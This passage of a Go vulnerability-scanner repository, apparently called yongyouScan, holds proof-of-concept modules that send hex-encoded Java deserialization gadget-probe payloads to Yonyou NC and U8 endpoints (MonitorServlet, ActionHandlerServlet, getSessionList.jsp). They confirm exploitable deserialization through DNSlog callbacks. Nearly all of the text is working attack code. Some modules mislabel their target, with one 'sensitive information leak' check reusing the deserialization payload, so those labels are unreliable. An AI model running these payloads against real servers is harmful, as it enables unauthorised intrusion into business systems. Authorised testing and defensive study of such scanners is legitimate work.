14 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
15 | )
16 | 
17 | func Run(url string) {
18 | 	domain, session := dnslog.GetDnslogUrl()
19 | 	url = url + "/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
20 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
21 | 		"User-Agent":     UA,
22 | 		"Content-Length": "20434",
23 | 		"Content-Type":   "application/x-www-form-urlencoded",
24 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
25 | 	if err != nil {
26 | 		color.Red.Println("[-] 用友NC XbrlPersistenceServlet反序列化漏洞不存在")
27 | 		return
28 | 	}
29 | 	if dnslog.GetDnslogRecord(session) {
30 | 		color.Green.Println("[+] 用友NC XbrlPersistenceServlet反序列化漏洞存在 -> " + url)
31 | 		return
32 | 	}
33 | 	color.Red.Println("[-] 用友NC XbrlPersistenceServlet反序列化漏洞不存在")
34 | }
35 | 


--------------------------------------------------------------------------------
/pkg/POC/u8-MonitorServlet/u8-MonitorServlet.go:
--------------------------------------------------------------------------------
 1 | package u8_MonitorServlet
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Content-Length": "16284",
24 | 		"Content-Type":   "application/x-www-form-urlencoded",
25 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 U8 MonitorServlet反序列化漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 U8 MonitorServlet反序列化漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 U8 MonitorServlet反序列化漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/U8-OA-getSessionList/U8-OA-getSessionList.go:
--------------------------------------------------------------------------------
 1 | package U8_OA_getSessionList
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Content-Length": "20434",
24 | 		"Content-Type":   "application/x-www-form-urlencoded",
25 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/U8-ActionHandlerServlet/U8-ActionHandlerServlet.go:
--------------------------------------------------------------------------------
 1 | package U8_ActionHandlerServlet
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url = url + "/service/~uap/com.ufida.zior.console.ActionHandlerServlet"
21 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Content-Length": "20327",
24 | 		"Content-Type":   "application/x-www-form-urlencoded",
25 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 U8 ActionHandlerServlet反序列化漏洞不存在")
28 | 		return
29 | 	}
30 | 	if dnslog.GetDnslogRecord(session) {
31 | 		color.Green.Println("[+] 用友 U8 ActionHandlerServlet反序列化漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 U8 ActionHandlerServlet反序列化漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
